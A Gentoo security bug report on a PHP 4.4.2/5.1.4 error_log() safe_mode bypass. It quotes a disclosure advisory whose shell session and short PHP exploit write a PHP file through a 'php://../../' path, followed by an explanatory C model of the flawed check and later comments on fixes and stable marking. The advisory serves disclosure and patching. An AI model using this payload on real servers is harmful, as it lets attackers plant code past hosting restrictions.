Bug 138180 - {dev-lang/php-4.4.2|dev-lang/php-5.1.4} (possibly more) Safe Mode bypass
Summary: {dev-lang/php-4.4.2|dev-lang/php-5.1.4} (possibly more) Safe Mode bypass
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All Linux
Importance: High normal
Assignee: Gentoo Security
URL: FD Mailinglist
Whiteboard: B3 [noglsa]
Reported: 2006-06-27 04:05 UTC by Wolf Giesen (RETIRED)
Modified: 2006-11-11 20:25 UTC
CC: 1 user

Comment 1 Wolf Giesen (RETIRED) gentoo-dev 2006-06-27 04:05:11 UTC
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
-Written: 10.6.2006
-Public: 26.06.2006
from SECURITYREASON.COM
CVE-2006-3011

--- 0. Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.
error_log -- Send an error message somewhere.

--- 1. error_log() Safe Mode Bypass ---
The error_log() function sends your error message to email, to a file, or to the display. You can send error messages by mail or write them into files. The issue is very simple. error_log() checks safe_mode and open_basedir in the stream function, but it is not allowed to use a URL. And the problem exists in an incorrect filename.

PHP5:
-2013-2050---
PHPAPI int _php_error_log(int opt_err, char *message, char *opt, char *headers TSRMLS_DC)
{
	php_stream *stream = NULL;

	switch (opt_err) {

		case 1:		/*send an email */
			{
#if HAVE_SENDMAIL
				if (!php_mail(opt, "PHP error_log message", message, headers, NULL TSRMLS_CC)) {
					return FAILURE;
				}
#else
				php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option not available!");
				return FAILURE;
#endif
			}
			break;

		case 2:		/*send to an address */
			php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP option not available!");
			return FAILURE;
			break;

		case 3:		/*save to a file */
			stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
			if (!stream)
				return FAILURE;
			php_stream_write(stream, message, strlen(message));
			php_stream_close(stream);
			break;

		default:
			php_log_err(message TSRMLS_CC);
			break;
	}
	return SUCCESS;
}
-2013-2050---

Let's look at option 3.

-2038 line---
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
-2038 line---

Option "a" writes the error to the file, or, if the file doesn't exist, creates a new file.
The problem is that in php_stream_open_wrapper() "IGNORE_URL" is defined.
IGNORE_URL turns off safe_mode if you use "prefix://../../".

-Example---
cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3, "/www/temp/sr.php");'

Warning: error_log(): SAFE MODE Restriction in effect.  The script whose uid is 0 is not allowed to access /www/temp owned by uid 80 in Command line code on line 1

Warning: error_log(/www/temp/sr.php): failed to open stream: Invalid argument in Command line code on line 1
cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3, "php://../../www/temp/sr.php");'
cxib# ls -la /www/temp/sr.php
-rw-r--r--  1 cxib  www  16 Jun 11 17:47 /www/temp/sr.php
cxib# 
-Example---

--- 2. Exploit ---
<?php
$file=""; # FILENAME
error_log("<? echo \"cx\"; ?>", 3, "php://../../".$file);
?>


--- 3. How to fix ---
No response from the PHP Team. We reported this bug on 11.06.2006.

--- 4. Greets ---

For: sp3x
and
p_e_a, l3x, pi3, eax, Infospec, gKPc8O3

--- 5. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (FreeBSD)

iD8DBQFEnwdh3Ke13X/fTO4RAv1eAJ9Gux0j+TtpuvsLMhGRu+b0B86DJQCfR4ps
qXoX8VYnwFBa2VmK3zlxpGs=
=VAkg
-----END PGP SIGNATURE-----
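The bug class behind the advisory above is a mismatch between what gets checked and what gets opened: a name shaped like "prefix://..." is treated as a URL for the purpose of the safe_mode policy, while the IGNORE_URL flag makes the open path drop the prefix and use the rest as a plain file. The following C model is an added example written for this bug report; it is not the advisory's code and not PHP's implementation. It assumes a constructed policy (only paths under ALLOWED_DIR, no ".." components) as a stand-in for the safe_mode uid and open_basedir checks, and it assumes, as a simplification of the advisory's description, that the vulnerable path skips that policy for URL-looking names. The hardened variant normalises the name first and applies the policy to the path that will actually be opened.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Constructed policy for this model: the only directory a script may write
 * log files into. Stands in for the safe_mode uid / open_basedir checks. */
#define ALLOWED_DIR "/www/app/logs"

/* If `path` starts with a "scheme://" prefix (letters, digits, '+', '-', '.'
 * followed by "://"), return a pointer to the part after it; otherwise NULL.
 * This is the "prefix://" shape the advisory describes. */
static const char *strip_scheme(const char *path)
{
    const char *p = path;
    while (isalnum((unsigned char)*p) || *p == '+' || *p == '-' || *p == '.')
        p++;
    if (p > path && strncmp(p, "://", 3) == 0)
        return p + 3;
    return NULL;
}

/* Policy check on a plain filesystem path: must sit under ALLOWED_DIR and
 * must contain no ".." component. A relative path therefore never passes. */
static bool path_allowed(const char *path)
{
    size_t n = strlen(ALLOWED_DIR);
    if (strncmp(path, ALLOWED_DIR, n) != 0 || path[n] != '/')
        return false;
    for (const char *s = path; *s != '\0'; ) {
        const char *e = strchr(s, '/');
        size_t len = e ? (size_t)(e - s) : strlen(s);
        if (len == 2 && s[0] == '.' && s[1] == '.')
            return false;
        if (e == NULL)
            break;
        s = e + 1;
    }
    return true;
}

/* Vulnerable model (assumption, not PHP's code): a name that looks like a
 * URL is assumed to be handled by its stream wrapper, so the plain-file
 * policy is skipped; but with the URL-ignoring open flag the scheme is
 * stripped and the remainder is opened as an ordinary file, so the check
 * and the open disagree. */
bool vulnerable_log_path_allowed(const char *opt)
{
    const char *plain = strip_scheme(opt);
    if (plain == NULL)
        return path_allowed(opt);   /* ordinary path: policy applies */
    return true;                    /* "URL": policy skipped, yet `plain` is what gets opened */
}

/* Hardened model: compute the path that will actually be opened first,
 * then apply the policy to that path. */
bool hardened_log_path_allowed(const char *opt)
{
    const char *plain = strip_scheme(opt);
    const char *effective = plain != NULL ? plain : opt;
    return path_allowed(effective);
}

int main(void)
{
    /* Constructed inputs modelled on the advisory's example session. */
    const char *inputs[] = {
        "/www/temp/sr.php",            /* plain path outside the allowed dir */
        "php://../../www/temp/sr.php", /* scheme prefix plus traversal */
        "/www/app/logs/app.log",       /* legitimate plain path */
        "php:///www/app/logs/app.log", /* scheme prefix, legitimate target */
    };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        printf("%-32s vulnerable=%d hardened=%d\n", inputs[i],
               vulnerable_log_path_allowed(inputs[i]),
               hardened_log_path_allowed(inputs[i]));
    }
    return 0;
}
```

Running the model shows the second input accepted by the vulnerable check and rejected by the hardened one; the other three inputs are decided the same way by both. The general lesson is the one a reviewer would look for in any path-handling code: the permission check must run on the string that is handed to open(), after every rewriting step (scheme stripping, prefix removal, normalisation) has been applied, not on the string the caller supplied.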
Comment 2 Wolf Giesen (RETIRED) gentoo-dev 2006-06-27 05:07:11 UTC
CHTEKK reports this as reproducible (somewhat incomplete on 5.1.4, though).
Comment 3 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2006-06-27 08:19:41 UTC
NB: i might be wrong, but i thought sec team doesn't handle "safe mode" issues
Comment 4 Wolf Giesen (RETIRED) gentoo-dev 2006-06-27 10:25:05 UTC
That would be wise indeed. I admit I didn't really put much thought in it as I was in a hurry @work and just didn't want to let it slip by.
Comment 5 Luca Longinotti (RETIRED) gentoo-dev 2006-07-14 09:22:25 UTC
Fixed in dev-lang/php-4.4.2-r6 and dev-lang/php-5.1.4-r4.
Stabling of those two PHP versions can be handled in bug 133524.
Best regards, CHTEKK.
Comment 6 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2006-07-22 23:53:05 UTC
This one is ready for GLSA decision. I vote NO.
Comment 7 Wolf Giesen (RETIRED) gentoo-dev 2006-07-23 01:13:15 UTC
Yeah, probably not worth it. "No".
Comment 8 Stefan Cornelius (RETIRED) gentoo-dev 2006-07-23 04:32:31 UTC
"No" and closed, feel free to reopen if you disagree blabla.
Comment 9 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2006-07-30 12:53:08 UTC
Reopening for stable marking, since bug #133524 does not affect the remaining arches. Sorry for the mess.
Comment 10 Thierry Carrez (RETIRED) gentoo-dev 2006-08-12 08:21:53 UTC
dev-lang/php-4.4.2-r6 and dev-lang/php-5.1.4-r4 still miss the hppa mark.
Comment 11 Thierry Carrez (RETIRED) gentoo-dev 2006-08-12 08:32:43 UTC
This is superseded by bug 143126 which requires higher versions stable marking.
Comment 12 René Nussbaumer (RETIRED) gentoo-dev 2006-08-12 13:16:32 UTC
remove us from cc.